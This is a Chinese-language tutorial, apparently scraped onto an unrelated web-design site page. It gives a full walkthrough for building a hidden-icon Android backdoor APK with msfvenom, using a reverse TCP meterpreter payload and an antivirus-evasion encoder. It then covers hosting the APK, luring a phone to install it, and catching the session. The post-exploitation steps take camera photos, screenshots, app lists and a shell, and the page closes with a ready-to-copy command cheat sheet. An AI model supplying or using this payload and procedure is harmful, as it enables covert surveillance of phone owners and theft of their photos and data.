wordpress区块链导航类网站58招聘网站官网
2026/3/17 6:26:58 网站建设 项目流程
wordpress区块链导航类网站,58招聘网站官网,wordpress主题lightsns,wordpress弹出框一、 环境准备与信息搜集1. 确定攻击机 IP 地址在 Kali Linux 终端执行 ifconfig 或 ip addr#xff0c;找到连接同一 WiFi 的网卡 IP。今晚实战 IP#xff1a;10.205.105.150重要性#xff1a;这是木马回连的 “指挥中心” 地址#xff0c;必须确保靶机手机能 Ping 通此 I…一、 环境准备与信息搜集1. 确定攻击机 IP 地址在 Kali Linux 终端执行ifconfig或ip addr找到连接同一 WiFi 的网卡 IP。今晚实战 IP10.205.105.150重要性这是木马回连的 “指挥中心” 地址必须确保靶机手机能 Ping 通此 IP。2. 靶机环境确认目标系统Android 11 (高版本权限限制较严)网络环境与 Kali 处于同一 WiFi 网段。前置条件手机需开启 “允许安装未知来源应用” 权限针对浏览器或文件管理器。二、 恶意载荷Payload生成与部署1. 使用 msfvenom 生成木马 APK利用 Metasploit 内置工具生成 Android 后门程序。核心命令bash运行msfvenom -p android/meterpreter/reverse_tcp \ LHOST10.205.105.150 \ LPORT4444 \ -o /var/www/html/hack.apk \ --platform android \ --arch dalvik \ AndroidMeterpreter::Options::HideAppIcontrue \ --encoder x86/shikata_ga_nai -i 3参数详解-p指定载荷为安卓反向 TCP Shell。LHOST/LPORT监听主机 IP 和端口。-o输出路径直接放入 Apache 网站根目录/var/www/html/。HideAppIcontrue生成无图标木马隐蔽性。--encoder编码免杀尝试绕过简单的杀软。2. 启动 Web 服务 (Apache)为了让手机通过浏览器下载木马。启动命令bash运行service apache2 restart本地测试bash运行curl http://10.205.105.150/hack.apk现象显示乱码二进制数据说明文件存在且服务正常。三、 监听与上线获取会话1. 配置 Metasploit 监听器在 Kali 终端打开msfconsole。配置流程bash运行use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 0.0.0.0 # 监听本机所有接口 set LPORT 4444 run2. 诱导靶机上线操作在靶机手机浏览器输入http://10.205.105.150/hack.apk。关键点浏览器可能提示 “不支持的文件类型”需长按链接选择 “下载链接” 或使用 Chrome 浏览器。安装时需授权 “来自未知来源的应用”。安装后桌面无图标因开启了 HideAppIcon但进程已在后台运行。3. 成功标志Kali 终端显示text[*] Meterpreter session X opened (10.205.105.150:4444 - ...)四、 后渗透攻击核心操作与排错进入meterpreter 提示符后执行的操作。1. 基础信息搜集查看系统信息sysinfo查看摄像头webcam_list实战问题Android 11 限制后台调用摄像头直接拍照可能失败 (Operation failed: 1)。解决方案改用screenshot截图或授予权限grant_permission android.permission.CAMERA。下载文件download /sdcard/DCIM/Camera(下载照片)2. APP 管理重难点攻克方法 A使用 Meterpreter 扩展推荐加载扩展bash运行load appapi列出所有 APP含第三方bash运行app_list -a实战问题中文乱码。解决方案忽略名称关注Package列包名或导出到文件查看。启动 APPbash运行app_run 包名方法 B使用 Android 原生 Shell兜底方案当 Meterpreter 命令失效时使用。进入 Shellbash运行shell -t 30 # -t 30 防止超时断开查找包名bash运行pm list packages | grep 关键词 # 如 grep tencent, grep browser启动 APPbash运行am start -n 包名/.主Activity # 简化版 am start 包名退出 Shellbash运行exit3. 可视化验证截图命令screenshot作用验证 APP 是否启动、查看手机当前界面。注意旧版命令screencap在新版中已变更为screenshot。五、 常见故障排除Troubleshooting这是今晚实战中遇到的 “坑” 及解决方案非常重要。故障现象原因分析解决方案Send timed out会话超时或网络不稳定1. 尝试sessions -i ID重连。2. 若无效手机重新安装 APK 触发上线。Permission Denial: INTERACT_ACROSS_USERS_FULLAndroid 11 安全机制禁止跨用户启动前台 Activity1. 忽略报错截图确认是否启动。2. 使用am start的简化版。3. 尝试授予android.permission.INTERACT_ACROSS_USERS_FULL通常失败。Unknown command: screencapMeterpreter 版本更新命令变更使用新命令screenshotAPP 列表中文乱码终端编码问题1. 只看Package列英文包名。2. 使用pm list packages在 Shell 中查看。摄像头拍照失败高版本安卓限制后台调用摄像头使用screenshot截取屏幕画面作为替代。六、 完整命令速查表可直接复制bash运行# 阶段一生成木马 service apache2 start msfvenom -p android/meterpreter/reverse_tcp LHOST10.205.105.150 LPORT4444 -o /var/www/html/hack.apk AndroidMeterpreter::Options::HideAppIcontrue # 阶段二启动监听 msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 run # 阶段三控制靶机 # 基础信息 sysinfo webcam_list screenshot # 核心验证命令 # APP 操作 load appapi app_list -a app_run com.tencent.mm # 示例启动微信 # 文件操作 download /sdcard/DCIM/Camera # 原生 Shell 操作 shell -t 30 pm list packages | grep tencent am start com.tencent.mm exit

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询